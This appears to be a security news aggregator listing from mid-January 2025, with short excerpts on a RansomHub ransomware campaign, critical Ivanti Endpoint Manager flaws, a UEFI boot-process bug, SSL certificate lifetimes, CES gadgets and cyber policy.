Let's Resurrect Shift-Left Security
Check out the on-demand webinar in which we discuss how a human-AI collaborative approach transforms security from a dreaded blocker into a powerful enabler of development velocity: “Broken Security Promises: How Human-AI Collaboration Rebuilds Developer Trust,” originally aired on Jan. 16, 2025 @ 12pm ET. Stay tuned for more insights into how HackerOne is working with dev teams to reinvent secure development together.
by HackerOne
2025-01-16 12:54:14
New gadgets unveiled at CES 2025, and their impact on security
Cybersecurity trends at the Consumer Electronics Show: from AI glasses to biometric locks.
by Kaspersky
2025-01-16 12:15:00
Python-Based Malware Powers RansomHub Ransomware to Exploit Network Flaws
Cybersecurity researchers have detailed an attack in which a threat actor used a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged that access to deploy the RansomHub ransomware throughout the target network. According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloader named
by The Hacker News
2025-01-16 12:09:00
Researcher Uncovers Critical Flaws in Multiple Versions of Ivanti Endpoint Manager
Ivanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure. All four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM and concern instances of absolute path traversal that allow a remote
by The Hacker News
2025-01-16 11:30:00
7 reasons to shorten SSL certificate validity periods
Shorter SSL certificate validity periods enhance digital security by reducing risks like private key compromise, misissuance, and revocation delays. They align certificate ownership with domain control, encourage crypto agility, and address limitations of current revocation methods. Short validity periods also promote automation, streamline renewal processes, and future-proof systems against evolving cybersecurity challenges. While increased renewal frequency poses challenges, adopting automated solutions can mitigate risks and ensure seamless management.
by Sectigo
2025-01-16 11:30:00
Biden's Cyber Ambassador Urges Trump Not to Cede Ground to Russia and China in Global Tech Fight
Nathaniel Fick, the ambassador for cyberspace and digital policy, has led US tech diplomacy amid a rising tide of pressure from authoritarian regimes. Will the Trump administration undo that work?
by WIRED Security News
2025-01-16 11:02:58
GitHub’s Deepfake Porn Crackdown Still Isn’t Working
Over a dozen programs used by creators of nonconsensual explicit images have evaded detection on the developer platform, WIRED has found.
by WIRED Security News
2025-01-16 11:00:00
Trusted Apps Sneak a Bug Into the UEFI Boot Process
Seven system recovery programs contained what amounted to a backdoor for injecting any untrusted file into the system startup process.
by Dark Reading